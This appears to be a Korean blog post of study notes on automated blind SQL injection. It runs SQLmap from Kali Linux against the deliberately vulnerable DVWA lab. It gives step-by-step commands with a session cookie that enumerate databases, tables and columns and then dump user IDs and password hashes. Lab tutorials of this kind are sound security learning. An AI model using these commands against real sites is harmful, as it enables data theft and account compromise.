처음 만나는 클라우드 보안

SQLmap 인젝션 자동화 공격 본문

정보보안

SQLmap 인젝션 자동화 공격

영민하게 2022. 5. 12. 10:06
반응형

SQL 인젝션 자동화란?

일종의 Blind SQL방식, 자동화 방식으로 반복 작업을 간편하게 수행할 수 있다.

: DB에 대한 정보가 없는 상태에서 DB에 질문을 하나씩 전송, YES or NO 형식의 응답이 이어진다. 여기서 수집된 정보들을 모아 DB이름, Table이름 등과 같은 정보를 파악한다.

 

 


SQL 인젝션 자동화 실습

: Kali Linux의 SQLmap툴을 이용하여, DVWA(Metasploitable2)에 SQL 인젝션 자동화를 수행한다.

 

참고) 직접적인 정보 탈취가 자동으로 구현되기 때문에 현재까지 배운 해킹툴 중 가장 치명적인 툴이다.

(좌) 공격대상 DVWA는 인터넷익스플로러로 접속 (우) Kali Linux는 VMware상으로 접속

 

SQLmap의 문법

$sudo sqlmap -u [URL 주소] --cookie=[쿠키값]

URL 주소: SQL injection(Blind) 메뉴에서 입력창 1~5 사이의 번호를 입력하면 주소표시줄의 주소를 사용한다. 

쿠키값: 주소표시줄에 'javascript:document.cookie'를 입력하여 화면에 출력된 쿠키값을 사용한다.

 

URL주소 참조
쿠키값 참조

 

1단계) DB이름 알아내기

sudo sqlmap -u "http://192.168.5.130/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=d81 a 05 ad7 d8 ede0 ee173 e53 e5182 c7 c7" --dbs

 

참고) 물어보는 내용 Y/n => Y선택, y/N => N선택, cookie = xxx => cookie=xxx (띄어쓰기 포함 시 안됨)

데이터베이스 목록 출력

 

2단계) Table이름 알아내기

sudo sqlmap -u "http://192.168.5.130/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=d81 a 05 ad7 d8 ede0 ee173 e53 e5182 c7 c7" -D dvwa --tables

 

dvwa데이터베이스의 Table목록 출력

3단계) Column 알아내기

sudo sqlmap -u "http://192.168.5.130/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=d81 a 05 ad7 d8 ede0 ee173 e53 e5182 c7 c7" -D dvwa -T users --columns

users테이블의 column출력

 

4단계) 계정과 비밀번호 알아내기

sudo sqlmap -u "http://192.168.5.130/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=d81a05ad7d8ede0ee173e53e5182c7c7" -D dvwa -T users -C user, password --dump

id와 해쉬값 크레킹까지 연결된 패스워드까지 알 수 있다.

 

 


본 게시물은 학습기록을 위한 포스팅입니다. 악의적인 목적으로 이용 시 발생할 수 있는 모든 법적 책임은 자신에게 있습니다.

반응형
Comments